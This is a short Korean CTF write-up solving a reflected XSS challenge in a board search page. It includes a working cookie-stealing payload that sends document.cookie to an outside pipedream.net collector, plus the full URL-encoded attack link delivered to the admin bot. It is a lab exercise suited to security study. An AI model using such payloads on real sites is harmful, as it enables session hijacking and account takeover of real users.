[CTF] XSS2

📌
XSS (Cross Site Scripting)
Cookie 탈취

---

취약점 설명 : Reflected XSS
취약점 발생 위치 : notice_list.php

---

회원가입-로그인-게시판 검색

입력한 값이 그대로 뜬다. Reflected XSS의 가능성!
특수문자 먼저 넣어본다.

HTML Entity로 바뀐다.

꺽쇠는 쓸 수 없으니 주어진 스크립트를 탈출하지 않고 alert(1) 먼저 출력해보자.

<script>alert('"입력값"에 대한 검색 결과가 존재하지 않습니다.')<script>

라고 되어 있으니 구문을 맞춰주기 위해 ')을 넣고 뒤는 주석처리 해주었다.

의도한대로 스크립트가 실행되는 것을 확인.

Reflected XSS니까 GET 방식으로도 작동하는지 꼭!!! 체크해야한다.
링크공격이기 때문에 URL로 만들어 보내 해당 URL로 접속하면 실행되어야한다. Burp에서 change request method 해준다.

GET방식으로 보냈을때 alert('1')이 작동하는 것을 확인.

뒤에다가 쿠키탈취 코드를 삽입한다. 검색창에

1'); var cookieData =document.cookie;var i =new Image(); i.src = "https://en2hyoic3j7mi.x.pipedream.net/?cookie=" + cookieData; //

를 입력하면 된다.

공격자 서버로 쿠키값이 넘어오는지 확인해보자.

쿠키값이 잘 넘어오고 있다!

관리자 봇에 해당 URL을 보내자.

http://ctf.segfaulthub.com:4343/xss_2/notice_list.php?option_val=username&board_result=1%27%29%3B+var+cookieData+%3Ddocument.cookie%3Bvar+i+%3Dnew+Image%28%29%3B+i.src+%3D+%22https%3A%2F%2Fen2hyoic3j7mi.x.pipedream.net%2F%3Fcookie%3D%22+%2B+cookieData%3B+%2F%2F&board_search=%F0%9F%94%8D&date_from=&date_to=

쿠키탈취 성공!